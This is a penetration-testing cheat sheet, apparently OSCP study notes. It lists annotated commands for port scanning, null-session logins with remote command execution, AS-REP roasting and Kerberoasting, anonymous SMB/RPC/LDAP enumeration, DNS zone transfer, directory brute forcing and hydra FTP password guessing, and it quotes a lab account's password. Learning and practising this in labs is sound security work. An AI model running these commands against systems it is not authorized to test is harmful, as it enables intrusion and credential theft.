OSCP Methodology

Enumeration

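# Target address. The sheet mixes $ip and $IP, so both are set from one value;
# ${ip:?} stops with a message instead of silently scanning an empty host.
IP=${ip:?set ip=<target> first}
mkdir -p nmap
# Default scripts + version probes on the top-1000 TCP ports (-Pn: no ping, -n: no DNS).
sudo nmap -sS "$IP" -sV -sC -Pn -n --open | tee -a nmap/nmap-default-script.md
# All 65535 TCP ports. -T5 with --min-rate 2000 is fast but lossy: nmap can
# drop replies and miss ports on a slow link or a fragile target. If the result
# looks thin, rescan the suspicious range at -T4 without --min-rate.
sudo nmap -sS "$IP" -p- -T5 --min-rate 2000 -Pn -n --open | tee -a nmap/nmap-full-ports.md
rustscan -a "$IP" | tee -a nmap/rustscan
sudo autorecon "$IP"
# UDP: top 100 ports only (a full UDP sweep is too slow); logged like the TCP scans.
sudo nmap -Pn -n "$IP" -sU --top-ports=100 | tee -a nmap/nmap-udp.md
# Null-session probes: empty user AND empty password on every service found.
# Failures are the normal outcome; a success means anonymous access is on.
# -x runs a command after login and exists only for protocols that can exec
# (smb/ssh/winrm/mssql/wmi). NOTE(review): NetExec's rdp protocol does not
# list -x (see `netexec rdp --help`), so the rdp line only tests the null bind.
netexec rdp   "$IP" -u '' -p ''
netexec wmi   "$IP" -u '' -p '' -x whoami
netexec smb   "$IP" -u '' -p '' -x whoami
netexec ldap  "$IP" -u '' -p ''
netexec ftp   "$IP" -u '' -p ''
netexec vnc   "$IP" -u '' -p ''
netexec winrm "$IP" -u '' -p '' -x whoami
netexec ssh   "$IP" -u '' -p '' -x whoami
netexec nfs   "$IP" -u '' -p ''
netexec mssql "$IP" -u '' -p '' -x whoami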

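# Share listing over a null session, then the same with the built-in guest
# account, which is often enabled on hosts that refuse null sessions.
netexec smb   "$ip" -u '' -p '' --shares
netexec smb   "$ip" -u 'guest' -p '' --shares
# Kerberos. Parameters come from the environment (domain, user, pass) rather
# than being baked into the sheet — the original line carried a lab account
# (domain=hutch.offsec user=fmcsorley pass=CrabSharkJellyfish192), kept here
# only as an example of the expected values.
# AS-REP Roasting (crack with hashcat -m 18200).
#  - No credentials: supply a username list; a hash comes back for each user
#    that has "Do not require Kerberos preauthentication" set.
impacket-GetNPUsers -dc-ip "$ip" -no-pass -usersfile users.txt "${domain:?set domain=<fqdn> first}/" -outputfile asrep.hashes
#  - With credentials: GetNPUsers finds the vulnerable users itself over LDAP.
impacket-GetNPUsers -dc-ip "$ip" -request "${domain:?}/${user:?}:${pass:?}" -outputfile asrep.hashes
# Kerberoasting (hashcat -m 13100): any valid domain account is enough.
impacket-GetUserSPNs -dc-ip "$ip" -request "${domain:?}/${user:?}:${pass:?}" -outputfile spn.hashes
# If either tool fails with KRB_AP_ERR_SKEW, the attacker clock drifts too far
# from the DC — sync it against the DC (e.g. sudo ntpdate "$ip") and retry.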

SMB 139,445

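# SMB Shares — null session first (-N: no password, no prompt), then guest,
# since one is frequently allowed when the other is not.
smbclient -N -L "//$ip"
smbclient -L "//$ip" -U 'guest%'
smbmap -H "$ip"
smbmap -H "$ip" -u 'guest' -p ''
# To pull a readable share in one go:
#   smbclient -N "//$ip/<share>" -c 'recurse ON; prompt OFF; mget *'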

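# Enum4Linux over a null session: the -ng rewrite first (-R RID cycling,
# -d detailed, -A everything), then the classic tool as a cross-check.
# Output is saved to disk, matching the logging done for the nmap scans.
enum4linux-ng -R -d -A "$ip" | tee -a enum4linux-ng.txt
enum4linux -a "$ip" | tee -a enum4linux.txt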

WEB

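# Directory brute force. gobuster needs no root, so sudo is dropped.
# Caveat on -b: blacklisting 403 hides paths that exist but are forbidden —
# still worth knowing — so remove 403 unless the target 403s everything.
wordlist=${wordlist:-/usr/share/wordlists/common_big.txt}
gobuster dir -w "$wordlist" -u "http://$IP" -t 42 -b 404,403,400 -o gobuster-root.txt
# Once the stack is known, rerun with extensions, e.g. -x php,txt,html,bak
# wordlist: larger list for a second pass. Kept as a comment — as a bare line
# the shell would try to execute the file.
# /usr/share/wordlists/common_big_directory-list-2.3-medium.txt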
- Subdomains / vhosts: if a domain name shows up (TLS certificate, redirects, SMB/LDAP domain), fuzz it too — `gobuster vhost -u http://$domain -w <subdomain list>` — and add any hit to /etc/hosts before browsing it.

DNS 53

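# DNS zone transfer (AXFR): a misconfigured server returns every record of the
# zone. The zone name is required — take it from the TLS certificate, the
# SMB/LDAP domain, or a reverse lookup (dig -x "$ip" @"$ip"). The lab example
# in the original was hutch.offsec.
dig axfr "${domain:?set domain=<zone> first}" @"$ip"
# Even without AXFR the apex records are informative (some servers answer ANY
# with a deliberately minimal reply, so expect less than a full dump).
dig any "$domain" @"$ip"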

RPC

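# MS-RPC over a null session (-U "" -N). Server info, then users and groups,
# then the domain and password policy. Read getdompwinfo (lockout threshold
# and window) BEFORE any password guessing so a spray does not lock accounts.
rpcclient -U "" -N "$ip" -c "srvinfo"
rpcclient -U "" -N "$ip" -c "enumdomusers"
rpcclient -U "" -N "$ip" -c "enumdomgroups"
rpcclient -U "" -N "$ip" -c "querydominfo"
rpcclient -U "" -N "$ip" -c "getdompwinfo"
# Per-user details (description, last logon, flags) by RID from enumdomusers,
# e.g. 0x1f4 is RID 500 (the built-in Administrator):
#   rpcclient -U "" -N "$ip" -c "queryuser 0x1f4"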

RDP 3389

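# The login screen occasionally lists local usernames. That only happens when
# NLA is off — the same condition under which rdesktop tends to connect at all,
# since it handles NLA/CredSSP poorly against current Windows.
rdesktop "$ip"
# xfreerdp negotiates NLA properly; /cert:ignore skips the self-signed
# certificate prompt. Without /u: it asks for credentials interactively.
xfreerdp /v:"$ip" /cert:ignore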

LDAP

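# LDAP with an anonymous bind (-x and no -D/-w; spelling it as -D '' -w '' is
# the same bind). Start with the naming contexts: they give the base DN that
# every later query needs, instead of hard-coding one.
ldapsearch -H "ldap://$ip" -x -s base namingcontexts
base_dn=${base_dn:?set base_dn from namingcontexts, e.g. DC=hutch,DC=offsec}
# Root DSE: DC name, functional level, supported controls.
ldapsearch -H "ldap://$ip" -x -s base -b '' "(objectClass=*)" "*" +
# Full anonymous dump of the domain partition (can be large).
ldapsearch -x -H "ldap://$ip" -b "$base_dn"
# User objects with their description/info attributes: in practice these free-
# text fields sometimes hold passwords or hints, so read them before anything else.
ldapsearch -x -H "ldap://$ip" -b "$base_dn" "(objectClass=user)" sAMAccountName description info | tee ldap-users.txt
nxc ldap "$ip" -u '' -p '' --query "(sAMAccountName=*)" ""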

FTP 21

- Default creds: try anonymous login first (user `anonymous` or `ftp`, any or empty password) — the wget line below assumes it works — then vendor defaults for the banner nmap reported.
- Upload/download: mirror everything readable (below). If the server is writable, check whether the FTP root overlaps with the web root — a file uploaded there becomes reachable over HTTP.
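# Mirror everything readable as the anonymous user (the password is arbitrary).
wget -r "ftp://Anonymous:pass@$IP"
# Password guessing. Before running it: if FTP authenticates against the domain
# or a local lockout policy, 1575 guesses per user will trip the threshold —
# check getdompwinfo from the RPC section first. hydra needs no root.
# -f stops at the first valid login, -t 4 keeps parallel connections low (many
# FTP daemons throttle or drop simultaneous logins), -o saves the hits.
hydra -L names.txt -P '/usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt' -s 21 -t 4 -f -o hydra-ftp.txt "ftp://$IP"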

Flag

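:: Flag files on Windows. Anchor the search at the drive root: without it,
:: dir only walks the current directory tree. /s recurses, /b prints bare paths.
dir /s /b C:\local.txt
dir /s /b C:\proof.txt
:: Linux equivalent: find / -name local.txt -o -name proof.txt 2>/dev/null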
